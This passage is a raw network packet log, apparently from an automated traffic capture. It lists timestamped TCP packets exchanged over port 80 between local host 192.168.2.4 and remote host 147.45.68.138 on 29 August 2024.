                                                      Aug 29, 2024 22:52:26.789104939 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789114952 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789115906 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.789130926 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.789146900 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.789148092 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789160967 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789170980 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789184093 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.789194107 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789206028 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789210081 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.789216995 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789230108 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789242029 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.789257050 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789268970 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789272070 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.789278030 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789289951 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789293051 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.789303064 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789314985 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.789325953 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789335966 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789341927 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.789345980 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789361954 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.789385080 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.789417028 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789427996 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789441109 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789457083 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.789463997 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789470911 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.789488077 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789498091 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789501905 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.789509058 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789520025 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789525032 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.789534092 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.789540052 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789556980 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.789565086 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.789575100 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.790381908 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.790395021 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.790405989 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.790431023 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.790457010 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.790507078 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.790517092 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.790527105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.790538073 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.790543079 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.790551901 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.790584087 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.790612936 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.790623903 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.790632963 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.790653944 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.790663958 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.790971994 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.790996075 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.791006088 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.791024923 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.791045904 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.791075945 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.791086912 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.791096926 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.791106939 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.791115046 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.791135073 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.791157007 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.791217089 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.791228056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.791237116 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.791248083 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.791254044 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.791259050 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.791266918 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.791270018 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.791279078 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.791282892 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.791294098 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.791304111 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.791305065 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.791317940 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.791326046 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.791337967 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.791353941 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.791364908 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.791378021 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.791388988 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.791393995 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.791400909 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.791410923 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.791412115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.791424036 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.791426897 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.791439056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.791443110 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.791450024 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.791457891 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.791486979 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.831677914 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.831692934 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.831703901 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.831716061 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.831727028 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.831732035 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.831737995 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.831749916 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.831758976 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.831763029 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.831773043 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.831790924 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.831810951 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.874494076 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874531031 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874543905 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874553919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874577999 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874588966 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874591112 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.874600887 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874613047 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874624968 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.874625921 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874631882 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.874655008 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.874667883 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874674082 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.874680996 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874691963 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874702930 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874708891 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.874716043 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.874716043 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874736071 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874742985 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.874761105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874763012 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.874779940 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874785900 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.874802113 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874804020 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.874813080 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874820948 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.874824047 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874830961 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.874849081 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.874850035 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874862909 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874871016 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.874876022 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874881029 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.874901056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874901056 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.874912977 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874916077 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.874924898 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874934912 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.874936104 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874949932 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874952078 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.874960899 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.874969959 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.874994993 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.875317097 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.875358105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.875358105 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.875370026 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.875394106 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.875405073 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.875407934 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.875416994 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.875444889 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.875457048 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.875463009 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.875469923 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.875487089 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.875493050 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.875505924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.875511885 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.875515938 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.875521898 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.875535965 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.875540972 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.875550985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.875555992 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.875564098 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.875575066 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.875576019 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.875586033 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.875606060 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.875617027 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.875623941 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.875631094 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.875657082 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.875771046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.875797987 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.875813961 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.875885010 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.875909090 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.875920057 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.875925064 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.875931978 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.875943899 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.875951052 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.875957012 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.875966072 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.875981092 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.875993013 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.875996113 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.876009941 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.876014948 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.876024008 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.876029015 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.876034975 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.876045942 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.876045942 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.876054049 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.876059055 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.876074076 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.876091957 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.876092911 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.876105070 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.876127005 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.876137018 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.876148939 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.876151085 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.876172066 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.876184940 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.876194954 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.876199961 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.876208067 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.876214027 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.876218081 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.876229048 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.876235008 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.876238108 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.876250982 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.876257896 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.876274109 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.876281023 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.876281023 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.876292944 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.876302958 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.876312971 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.876317978 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.876322985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.876333952 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.876342058 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.876343966 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.876369953 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.876369953 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877101898 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877121925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877145052 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877157927 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877238989 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877249956 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877259970 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877270937 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877275944 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877283096 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877291918 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877295017 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877315044 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877329111 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877516985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877538919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877549887 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877557039 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877559900 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877573013 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877578020 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877585888 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877585888 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877597094 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877609968 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877620935 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877624989 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877631903 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877646923 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877654076 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877660990 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877666950 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877676964 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877679110 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877685070 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877705097 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877706051 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877718925 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877722979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877738953 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877743959 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877756119 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877756119 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877768993 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877772093 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877790928 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877793074 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877804995 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877804995 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877815962 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877832890 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877840042 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877846003 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877856970 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877861023 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877866983 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877868891 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877887011 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877895117 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877902985 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877909899 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877923012 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877932072 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877934933 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877938032 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877948046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877959967 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877960920 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877969027 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877973080 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.877985954 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.877999067 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.878015995 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.918303967 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.918314934 CEST8049739147.45.68.138192.168.2.4
